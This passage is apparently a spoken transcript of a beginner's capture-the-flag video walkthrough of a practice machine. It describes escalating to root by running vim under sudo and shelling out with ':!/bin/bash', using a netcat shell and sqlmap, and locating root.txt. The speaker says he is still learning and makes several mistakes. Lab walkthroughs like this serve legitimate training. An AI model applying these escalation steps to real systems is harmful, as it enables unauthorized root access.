bit like Sublime. So we copy and paste in that command, bin v, which will open up, and then the real path location to that pg_hba file. And now you'll see something very strange, because we haven't upgraded our shell, because for whatever reason the Python script didn't work. It's kind of glitching out. But we can just type in a command, because the vim text editor can take commands, and what the command is :/bin/bash. So if we just type that in anywhere in the file really, and just press enter, it should work. However, it didn't at first, because I think the code that I typed in was hidden behind a line of comments, because the comments line start with the hashtag, and it was too high up in the file, because that's where all the hashtags are, that it didn't read the code. It didn't read the : bin bash. So we go back into it, type that, copy and paste that command back in to open up this file with vim editor, and again, look, it's glitching out. But I tried once more: : bin bash. Press enter, nothing. Tried once more: : bin bash. And I don't know exactly where I am in the vim file. Didn't work, so I decided to hold enter, and it will go all the way down, and I've got to a line within the file where there isn't a hashtag, so it won't get ignored. It will read it, and luckily it did read it, because if you enter it correctly, the : bin bash, it should bring you out of vim. Just hold enter a few times like I did to go down to get past the glitched text. And type in who am I, and you should get root. Now then we need to find the root.txt, and this is where the find command came in really useful for me. Find slash dash type F for file dash name, and then the name of it, which is root.txt, and we know it's there. Then we can just change directory to the root, and that's where it is. It's just in the root, or the dash. I don't know what the root, what the first file, basically the home of the machine, and then in that it's in root, because the first slash before the word root means like the root. Confusing. But yeah, there you go. On the screen now I have, because I've catted out what's in the root.txt file, we have the flag, and I just copy and pasted that straight away because I knew I was going to lose connection. But once it's on the screen there, as long as I don't close the terminal, it will be there now to copy and paste over. So pretty much done now. I just thought I'd have a mess around, like why didn't that work before? The find slash dash type F dash name pg underscore hba.conf. But it's working now. The reason it didn't work before, I found out, was because I didn't have sudo permissions. Now that I'm the root, I have sudo permissions, so it doesn't need to try and access, because I believe what it was doing was it was trying to access all these files on the computer, trying to find what I'd asked it to find. But obviously back then I didn't have root permissions, so as you can see on this machine, this user Postgres doesn't have access to anything, any directory, because every single time it tried to go into the directory to find the file, it couldn't get it. But here you go, the first one that I missed earlier, but I can see it now. etc PostgreSQL 11 main, that file, that directory, we must have access to, because it didn't say permission denied. So the first thing that it shows me, it did work. I just missed it earlier. So that find command did work, but obviously it just listed everything else that was denied access because of the account I was on. But now that I'm a super user, I type in the find and it just finds it straight away, and it doesn't need any to tell me about any folders that it couldn't access because it didn't have the permissions, because it does have permissions now because it's root. And then I just tried a couple more things messing around. Typed in this is where I think I see my mistake in a minute. I just thought I'd try this shell command again, and it kind of something strange was going on, some kind of glitch, because the shell itself, the netcat shell, isn't great really. It's not as good as like a normal terminal kind of shell. So I thought, well, okay, can I get back to the var www.html? Yeah, that was fine. Can I get this Python 3 script to work to upgrade this shell? And then I realized the mistake was I'd put in import pty semicolon pyt dot spawn, and it should have been pty semicolon pty again. I think I realized that. If not now, I realized it later. And then I thought maybe I could change directory to bin bash, but the bash isn't a directory. The bin is, but the bash isn't. So I just went to the bin, ls, obviously there's loads there. I know bash is there, so I typed in file bash so it could tell me what it was, and it's an executable, so it's not a directory. I think this is when I realised my mistake, that pyt misspelling should be changed to pty. There you go. So I copied that in, for right, well I'll try the command that works now. Does that do anything for us? No, didn't seem like it did anything for us at all. Yeah, everything seemed the same. There was no history, there was no autocomplete. I couldn't use my arrow keys left or right to navigate. It just seemed to be the exact same shell. So for whatever reason, maybe this machine doesn't have Python 3 on it. For whatever reason, that cheat, that Python 3 little piece of command doesn't work on this, even though the PDF says it does work. I don't know if it does or not, but I couldn't get it to work anyway. And then I realised I seem to have lost permissions, so I typed in find again, and even though it did give me the file I needed, it also spew out all these denied permissions. But then I realised maybe it's because I didn't put sudo. So I tried sudo l, and then yeah, I could see I'd been kicked out of the root. I've been put back into Postgres user. So I went back through the motions of copying and pasting this command. Use Vim editor on the pg_hba.conf file. Run it as sudo though. Get into the Vim, press enter a few times, make sure we're kind of like, even though we can't see it, we're at the bottom. Type in : exclamation mark, and then it is it's a dash. Slash bin bash. There you go. Get back to root, and we know we're root straight away because it says root at vaccine. Who am I confirms we are root. And just list where we are. We're in this folder with the dashboard.php file. So I went back a few times, just messing around now really. So I'm pretty much finished. And this is as far back up as you can go. This is like the root directory. And within the root directory, there is another directory called root. That's the confusing thing. And I thought, well, could we find the root.txt again? Find /-name root.txt. Yeah, there it is. It's in the root folder. So change directory to root. There it is. Look, I'm just highlighting it now. And then in here, look, is pghpa.conf file. A different one, maybe? Must be a different one because it's in a different location. And then the root.txt. Unless it's the same file, but the other one was like a symbolic link or something. I'm not sure. I should have catted out that pg_hpa.conf. But just as I tried to cat out the root.txt, I'd lost connection. The SQL map had gone down. And if that SQL connection goes down, you can pretty much guarantee the netcat connection goes down. So yeah, I did have a couple of minutes to try and just experiment really and play around and just learn really what those commands did, how to maneuver through the system. But you don't get long before you are kicked out, as I mentioned earlier. But because I copy and pasted the flag before, I'm good to go now. What I'm going to do is just space the flag out and zoom the camera in on the string, so that if you're just having a nightmare with it and you just want to get it over with, because it's not your fault if anything goes wrong, it's the server and the connection. There you go. You can copy and paste this command, not copy and paste, rather just copy this command into the machine. Oh, that's why I got connected, because someone had reset the machine again, which I can't blame them. Yeah, so that's the machine really. There's only the one flag. I think there used to be two, but they must have updated it and got rid of the user flag. Hopefully by the time you watch this video, this machine shouldn't have the issues and everything should just work straight away. Hopefully they've updated it, patched it by them. But yeah, I definitely gave it 10 out of 10 for difficulty. Well, not for difficulty, but 10 out of 10 for frustration for this machine. And now I'm just going to start to close everything down and then reset my snapshot. Reset my machine back to a default initialization. Big thanks to Minato TW for creating the machine, creating the PDF walkthrough, and to Ghost Warrior down here, because this is the person who, if you click on their walkthrough, takes you to their video tutorial, similar to mine, and they had similar problems. So that watching that was what kind of keyed me into the fact that I bet most, if not everybody, has issues with this machine. So yeah. If I got anything wrong, I do apologise. Like I said, I'm still learning it. I'm fairly new to hacking, but I hope it was useful in whichever way you used the video. So yeah, thanks for watching.